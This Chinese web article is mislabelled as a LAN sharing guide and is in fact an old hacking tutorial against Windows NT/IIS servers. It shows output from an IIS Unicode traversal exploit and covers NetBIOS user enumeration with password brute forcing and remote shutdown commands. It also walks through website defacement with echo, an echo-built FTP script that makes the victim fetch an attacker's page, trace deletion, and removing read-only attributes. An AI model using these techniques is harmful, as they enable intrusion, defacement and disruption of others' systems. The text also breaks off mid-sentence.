局域网电脑互访的设置大全(2)
[11-11 12:19:17] 来源:http://www.duoxue8.com 局域网 阅读:306次6:set
如果你跑进了一部机子,而且想黑他(这思想只能在特别时候才准有),当
然他的80端口要开,不然你黑给谁看。这时需要用SET命令!
下面是我得到的结果!我来分析它,只是找主页在那而已。
COMPUTERNAME=PENTIUMII
ComSpec=D:WINNTsystem32cmd.exe
CONTENT_LENGTH=0
GATEWAY_INTERFACE=CGI/1.1
HTTP_ACCEPT=*/*
HTTP_ACCEPT_LANGUAGE=zh-cn
HTTP_CONNECTION=Keep-Alive
HTTP_HOST=当前登陆者的IP,这里本来是显示我的IP,被我删除
了
HTTP_ACCEPT_ENCODING=gzip, deflate
HTTP_USER_AGENT=Mozilla/4.0 (compatible; MSIE 5.0;
Windows 98;
DigExt)
NUMBER_OF_PROCESSORS=1
Os2LibPath=D:WINNTsystem32os2dll;
OS=Windows_NT
Path=D:WINNTsystem32;D:WINNT
PATHEXT=.COM;.EXE;.BAT;.CMD
PATH_TRANSLATED=E:vlroot主页放在的地址,只要你看到
PATH_TRANSLATED=的后面就是主页的存放地址。这里是E:vlroot
PROCESSOR_ARCHITECTURE=x86
PROCESSOR_IDENTIFIER=x86 Family 6 Model 3 Stepping 3,
GenuineIntel
PROCESSOR_LEVEL=6
PROCESSOR_REVISION=0303
PROMPT=$P$G
QUERY_STRING=/c+set
REMOTE_ADDR=XX.XX.XX.XX
REMOTE_HOST=XX.XX.XX.XX
REQUEST_METHOD=GET
SCRIPT_NAME=/scripts/..%2f../winnt/system32/cmd.exe
SERVER_NAME=XX.XX.XX.XX
SERVER_PORT=80
SERVER_PORT_SECURE=0
SERVER_PROTOCOL=HTTP/1.1
SERVER_SOFTWARE=Microsoft-IIS/3.0对方使用IIS/3.0
SystemDrive=D:
SystemRoot=D:WINNT
TZ=GMT-9
USERPROFILE=D:WINNTProfilesDefault User
windir=D:WINNT
粉红色的那行就是对方主页存放地址,这里告诉大家一个技巧,很笨的技巧
啊,不过只能用这个方法才能100%的找到主页的名称,当你DIR这个目录时
,一定会看到很多文件,你可以把所有文件在浏览器这样输入XX.XX.XX.XX/
文件名,这样只要看到和XX.XX.XX.XX看到的也面一模一样,那么这就是主
页的名称了。
7:nbtstat
如果你扫到一部NT的机子,他的136到139其中一个端口开了的话,就要用这
个命令得到用户了。顺便告诉大家这是netbios,得到用户名后就可以猜猜
密码了。例如比较简单的密码,密码和用户名一样的,都试下,不行就暴力
破解吧!现在网上很多NT的机子都开了这些端口的,你可以练习下,我们来
分析得到的结果。命令是nbtstat -A XX.XX.XX.XX -A一定要大写哦。这个
我认为大不大写没有太大差别,用处还是一样的。之后用net use \对方IP
连接一下! net view \对方IP 查看对方共享文件夹net use X: \IP对
方共享文件 映*对方共享文件夹成为本机的X盘这就是139端口的基本用
法!不过前提是必须对方开共享!
netstat -n看看谁连接你
下面是得到的结果。
NetBIOS Remote Machine Name Table
Name Type Status
---------------------------------------------
Registered Registered Registered Registered Registered
Registered
Registered Reg
istered Registered Registered Registered
MAC Address = 00-E0-29-14-35-BA
PENTIUMII <00> UNIQUE
PENTIUMII <20> UNIQUE
ORAHOTOWN <00> GROUP
ORAHOTOWN <1C> GROUP
ORAHOTOWN <1B> UNIQUE
PENTIUMII <03> UNIQUE
INet~Services <1C> GROUP
IS~PENTIUMII...<00> UNIQUE
ORAHOTOWN <1E> GROUP
ORAHOTOWN <1D> UNIQUE
..__MSBROWSE__.<01> GROUP
粉红色的就是登陆过这部系统的用户,可能你不知道怎么看,大家是不是看
到了一窜数字,只要这窜数字是 <03> 的话,那他前面的就是用户.
这里的用户是PENTIUMII。
没有03说明:MAC没和IP捆在一起了
8:Shutdown
关了对方的NT服务器的命令
Shutdown \IP地址 t:20
20秒后将NT自动关闭,三思后才能运行这个命令,这样对对方造很大的损失
,要做个有良心的入侵者呀。
Telnet进去用命令或者是本地用什么软件重启对方电脑
shutdown -m \计算机名称 可以远程重起或关闭的
9:DIR
这个命令没什么好讲,但是却非常重要,他是查看一目录里的所有文件、文
件夹。你可以本地试下。
10:echo著名的漏洞Unicode,这个命令可以简单的黑一下有这个漏洞的主
机。我们假设我们要把“南京大屠杀铁证如山,任何日本人不得抵赖!”写
入index.htm,有2种方法,大家看看有什么区别。echo 南京大屠杀铁证如
山,任何日本人不得抵赖!>index.htm echo 南京大屠杀铁证如山,任何
日本人不得抵赖!>>index.htm第一个的意思是覆盖index.htm原有的内容
,把“南京大屠杀铁证如山,任何日本人不得抵赖!”写进index.htm。第
二个的意思是把“南京大屠杀铁证如山,任何日本人不得抵赖!”加到
index.htm里面。 “>>”产生的内容将追加进文件中,“>”则将原文件内
容覆盖。这里说明一下,<和>是重定向命令只是一个是输入重定向另一个是
输出重定向,比如我们在命令提示符下就会显示c:>这个意思就是把C盘的
命令权重定向给我们,同样:也是定向的命令也叫作管道,它是用来连接两
个命令的管道,先执行管道左边的命令,再执行管道右边的命令,不过我是
没能耐把DOS命令说明白的,想研究就买本dos大全看吧,够看半年的了。
大家可以本地试下。
可能你会问,这样简单黑下有什么好玩的,其实他可以用来下载主页到对方
的目录里。
1、首先,我们需要申请一个免费的主页空间。
2、用echo在可写目录下建立如下内容的txt文件:(以chinren服务器为例
。)
open upload.chinaren.com(你的FTP服务器,申请时你的空间提供商会给
你的)
cnhack(你申请时的用户名)
test(你申请时的密码)
get index.htm
c:inetpubwwwrootindex.htm(这里是把你空间上的index.htm下载到对
方的c:inetpubwwwrootindex.htm)
bye(退出FTP对话,相当在98下的DOS,用EXIT退出DOS)
具体的做法:
输入 echo open upload.chinaren.com> c:cnhack.txt
输入 echo cnhack >> c:cnhack.txt
输入 echo 39abs >> c:cnhack.txt
输入 echo get index.htm
c:inetpubwwwrootindex.htm+>>+c:cnhack.txt
最后输入 ftp -s:c:cnhack.txt (利用ftp的-s参数,执行文件
里的内容。)等命令完成时,文件已经下载到你指定的文件里了。
注意:取得文件后,请删除cnhack.txt。(如果不删除,很容易会
给别人看到你的密码。)
记得要 del c:cnhack.txt
11:attrib这个命令是设置文件属性的。如果你想黑一个站,而他的主页的
文件属性设置了只读,那就很可怜呀,想删除他也不行,想覆盖他也不行。
倒!不过有这个命令就别怕了。
attrib -r index.htm这个命令是把index.htm的只读属性去掉。 如果把“
局域网电脑互访的设置大全(2) 结束。
- ·上一篇:局域网电脑互访的设置大全(3)
- ·下一篇:局域网电脑互访的设置大全(1)
- › 局域网电脑互访的设置大全(1)
- › 局域网电脑互访的设置大全(2)
- › 局域网电脑互访的设置大全(3)
- › 局域网电脑互访的设置大全(4)
- 在百度中搜索相关文章:局域网电脑互访的设置大全(2)